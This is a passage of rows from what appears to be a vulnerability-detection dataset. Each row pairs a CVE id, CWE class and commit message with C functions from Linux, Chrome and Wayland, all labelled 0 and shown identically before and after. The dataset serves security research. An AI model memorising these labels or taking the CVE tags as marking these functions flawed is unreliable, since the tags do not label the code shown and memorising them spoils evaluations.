but may be freely dropped afterwards - the snapshot will stay
until destroyed by release_dentry_name_snapshot().
Intended use:
struct name_snapshot s;
take_dentry_name_snapshot(&s, dentry);
...
access s.name
...
release_dentry_name_snapshot(&s);
Replaces fsnotify_oldname_...(), gets used in fsnotify to obtain the name
to pass down with event.
Signed-off-by: Al Viro <viro@zeniv.linux.org.uk> | static inline u64 hash_name(const void *salt, const char *name)
{
unsigned long hash = init_name_hash(salt);
unsigned long len = 0, c;
c = (unsigned char)*name;
do {
len++;
hash = partial_name_hash(c, hash);
c = (unsigned char)name[len];
} while (c && c != '/');
return hashlen_create(end_name_hash(hash), len);
}
| static inline u64 hash_name(const void *salt, const char *name)
{
unsigned long hash = init_name_hash(salt);
unsigned long len = 0, c;
c = (unsigned char)*name;
do {
len++;
hash = partial_name_hash(c, hash);
c = (unsigned char)name[len];
} while (c && c != '/');
return hashlen_create(end_name_hash(hash), len);
}
| C | linux | 0 |
CVE-2012-5148 | https://www.cvedetails.com/cve/CVE-2012-5148/ | CWE-20 | https://github.com/chromium/chromium/commit/e89cfcb9090e8c98129ae9160c513f504db74599 | e89cfcb9090e8c98129ae9160c513f504db74599 | Remove TabContents from TabStripModelObserver::TabDetachedAt.
BUG=107201
TEST=no visible change
Review URL: https://chromiumcodereview.appspot.com/11293205
git-svn-id: svn://svn.chromium.org/chrome/trunk/src@167122 0039d316-1c4b-4281-b951-d872f2087c98 | AppLaunchObserver::~AppLaunchObserver() {}
| AppLaunchObserver::~AppLaunchObserver() {}
| C | Chrome | 0 |
CVE-2013-1828 | https://www.cvedetails.com/cve/CVE-2013-1828/ | CWE-20 | https://github.com/torvalds/linux/commit/726bc6b092da4c093eb74d13c07184b18c1af0f1 | 726bc6b092da4c093eb74d13c07184b18c1af0f1 | net/sctp: Validate parameter size for SCTP_GET_ASSOC_STATS
Building sctp may fail with:
In function ‘copy_from_user’,
inlined from ‘sctp_getsockopt_assoc_stats’ at
net/sctp/socket.c:5656:20:
arch/x86/include/asm/uaccess_32.h:211:26: error: call to
‘copy_from_user_overflow’ declared with attribute error: copy_from_user()
buffer size is not provably correct
if built with W=1 due to a missing parameter size validation
before the call to copy_from_user.
Signed-off-by: Guenter Roeck <linux@roeck-us.net>
Acked-by: Vlad Yasevich <vyasevich@gmail.com>
Signed-off-by: David S. Miller <davem@davemloft.net> | static int sctp_setsockopt_rtoinfo(struct sock *sk, char __user *optval, unsigned int optlen)
{
struct sctp_rtoinfo rtoinfo;
struct sctp_association *asoc;
if (optlen != sizeof (struct sctp_rtoinfo))
return -EINVAL;
if (copy_from_user(&rtoinfo, optval, optlen))
return -EFAULT;
asoc = sctp_id2assoc(sk, rtoinfo.srto_assoc_id);
/* Set the values to the specific association */
if (!asoc && rtoinfo.srto_assoc_id && sctp_style(sk, UDP))
return -EINVAL;
if (asoc) {
if (rtoinfo.srto_initial != 0)
asoc->rto_initial =
msecs_to_jiffies(rtoinfo.srto_initial);
if (rtoinfo.srto_max != 0)
asoc->rto_max = msecs_to_jiffies(rtoinfo.srto_max);
if (rtoinfo.srto_min != 0)
asoc->rto_min = msecs_to_jiffies(rtoinfo.srto_min);
} else {
/* If there is no association or the association-id = 0
* set the values to the endpoint.
*/
struct sctp_sock *sp = sctp_sk(sk);
if (rtoinfo.srto_initial != 0)
sp->rtoinfo.srto_initial = rtoinfo.srto_initial;
if (rtoinfo.srto_max != 0)
sp->rtoinfo.srto_max = rtoinfo.srto_max;
if (rtoinfo.srto_min != 0)
sp->rtoinfo.srto_min = rtoinfo.srto_min;
}
return 0;
}
| static int sctp_setsockopt_rtoinfo(struct sock *sk, char __user *optval, unsigned int optlen)
{
struct sctp_rtoinfo rtoinfo;
struct sctp_association *asoc;
if (optlen != sizeof (struct sctp_rtoinfo))
return -EINVAL;
if (copy_from_user(&rtoinfo, optval, optlen))
return -EFAULT;
asoc = sctp_id2assoc(sk, rtoinfo.srto_assoc_id);
/* Set the values to the specific association */
if (!asoc && rtoinfo.srto_assoc_id && sctp_style(sk, UDP))
return -EINVAL;
if (asoc) {
if (rtoinfo.srto_initial != 0)
asoc->rto_initial =
msecs_to_jiffies(rtoinfo.srto_initial);
if (rtoinfo.srto_max != 0)
asoc->rto_max = msecs_to_jiffies(rtoinfo.srto_max);
if (rtoinfo.srto_min != 0)
asoc->rto_min = msecs_to_jiffies(rtoinfo.srto_min);
} else {
/* If there is no association or the association-id = 0
* set the values to the endpoint.
*/
struct sctp_sock *sp = sctp_sk(sk);
if (rtoinfo.srto_initial != 0)
sp->rtoinfo.srto_initial = rtoinfo.srto_initial;
if (rtoinfo.srto_max != 0)
sp->rtoinfo.srto_max = rtoinfo.srto_max;
if (rtoinfo.srto_min != 0)
sp->rtoinfo.srto_min = rtoinfo.srto_min;
}
return 0;
}
| C | linux | 0 |
CVE-2017-16612 | https://www.cvedetails.com/cve/CVE-2017-16612/ | CWE-190 | https://cgit.freedesktop.org/wayland/wayland/commit/?id=5d201df72f3d4f4cb8b8f75f980169b03507da38 | 5d201df72f3d4f4cb8b8f75f980169b03507da38 | null | XcursorImagesSetName (XcursorImages *images, const char *name)
{
char *new;
if (!images || !name)
return;
new = malloc (strlen (name) + 1);
if (!new)
return;
strcpy (new, name);
if (images->name)
free (images->name);
images->name = new;
}
| XcursorImagesSetName (XcursorImages *images, const char *name)
{
char *new;
if (!images || !name)
return;
new = malloc (strlen (name) + 1);
if (!new)
return;
strcpy (new, name);
if (images->name)
free (images->name);
images->name = new;
}
| C | wayland | 0 |
null | null | null | https://github.com/chromium/chromium/commit/d4cd2b2c0953ad7e9fa988c234eb9361be80fe81 | d4cd2b2c0953ad7e9fa988c234eb9361be80fe81 | DevTools: 'Overrides' UI overlay obstructs page and element inspector
BUG=302862
R=vsevik@chromium.org
Review URL: https://codereview.chromium.org/40233006
git-svn-id: svn://svn.chromium.org/blink/trunk@160559 bbb929c8-8fbe-4397-9dbb-9b2b20218538 | void InspectorPageAgent::didScroll()
{
if (m_enabled)
m_overlay->update();
}
| void InspectorPageAgent::didScroll()
{
if (m_enabled)
m_overlay->update();
}
| C | Chrome | 0 |
CVE-2014-3200 | https://www.cvedetails.com/cve/CVE-2014-3200/ | null | https://github.com/chromium/chromium/commit/c0947dabeaa10da67798c1bbc668dca4b280cad5 | c0947dabeaa10da67798c1bbc668dca4b280cad5 | [Contextual Search] Change "Now on Tap" to "Contextual Cards"
BUG=644934
Review-Url: https://codereview.chromium.org/2361163003
Cr-Commit-Position: refs/heads/master@{#420899} | bool found() const { return !key.empty(); }
| bool found() const { return !key.empty(); }
| C | Chrome | 0 |
CVE-2011-3107 | https://www.cvedetails.com/cve/CVE-2011-3107/ | null | https://github.com/chromium/chromium/commit/89e4098439f73cb5c16996511cbfdb171a26e173 | 89e4098439f73cb5c16996511cbfdb171a26e173 | [Qt][WK2] There's no way to test the gesture tap on WTR
https://bugs.webkit.org/show_bug.cgi?id=92895
Reviewed by Kenneth Rohde Christiansen.
Source/WebKit2:
Add an instance of QtViewportHandler to QQuickWebViewPrivate, so it's
now available on mobile and desktop modes, as a side effect gesture tap
events can now be created and sent to WebCore.
This is needed to test tap gestures and to get tap gestures working
when you have a WebView (in desktop mode) on notebooks equipped with
touch screens.
* UIProcess/API/qt/qquickwebview.cpp:
(QQuickWebViewPrivate::onComponentComplete):
(QQuickWebViewFlickablePrivate::onComponentComplete): Implementation
moved to QQuickWebViewPrivate::onComponentComplete.
* UIProcess/API/qt/qquickwebview_p_p.h:
(QQuickWebViewPrivate):
(QQuickWebViewFlickablePrivate):
Tools:
WTR doesn't create the QQuickItem from C++, not from QML, so a call
to componentComplete() was added to mimic the QML behaviour.
* WebKitTestRunner/qt/PlatformWebViewQt.cpp:
(WTR::PlatformWebView::PlatformWebView):
git-svn-id: svn://svn.chromium.org/blink/trunk@124625 bbb929c8-8fbe-4397-9dbb-9b2b20218538 | QQuickWebView::QQuickWebView(QQuickItem* parent)
: QQuickFlickable(parent)
, d_ptr(createPrivateObject(this))
, m_experimental(new QQuickWebViewExperimental(this))
{
Q_D(QQuickWebView);
d->initialize();
}
| QQuickWebView::QQuickWebView(QQuickItem* parent)
: QQuickFlickable(parent)
, d_ptr(createPrivateObject(this))
, m_experimental(new QQuickWebViewExperimental(this))
{
Q_D(QQuickWebView);
d->initialize();
}
| C | Chrome | 0 |
Subsets and Splits